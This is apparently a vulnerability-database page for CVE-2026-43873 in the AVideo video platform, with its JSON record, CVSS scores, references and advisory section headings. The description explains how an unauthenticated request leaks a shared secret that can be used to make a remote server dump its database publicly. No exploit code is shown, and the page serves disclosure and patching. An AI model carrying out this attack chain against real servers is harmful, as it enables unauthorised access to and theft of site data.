      "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone-\u003emyKey, a constant md5($global[\u0027systemRootPath\u0027] . $global[\u0027salt\u0027])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server\u0027s cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote\u0027s database to the remote\u0027s public videos/clones/ directory Commit e6566f56a28f4556b2a0a09d03717a719dcb49da contains an updated fix."
    }
  ],
  "id": "CVE-2026-43873",
  "lastModified": "2026-05-12T14:50:18.527",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-11T22:22:11.703",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-209"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-43873 (GCVE-0-2026-43873)

GHSA-QM9P-P5PW-JRX2

Summary

Details

1. The leak (plugin/CloneSite/cloneClient.json.php:51-60)

2. Where myKey comes from (plugin/CloneSite/CloneSite.php:67)

3. Why the leaked key is dangerous (cross-site chain)

4. Not fixed by the previous clones.json.php hardening

PoC

Impact

Recommended Fix

FKIE_CVE-2026-43873

Tags

Sightings

Nomenclature

1. The leak (`plugin/CloneSite/cloneClient.json.php:51-60`)

2. Where `myKey` comes from (`plugin/CloneSite/CloneSite.php:67`)

4. Not fixed by the previous `clones.json.php` hardening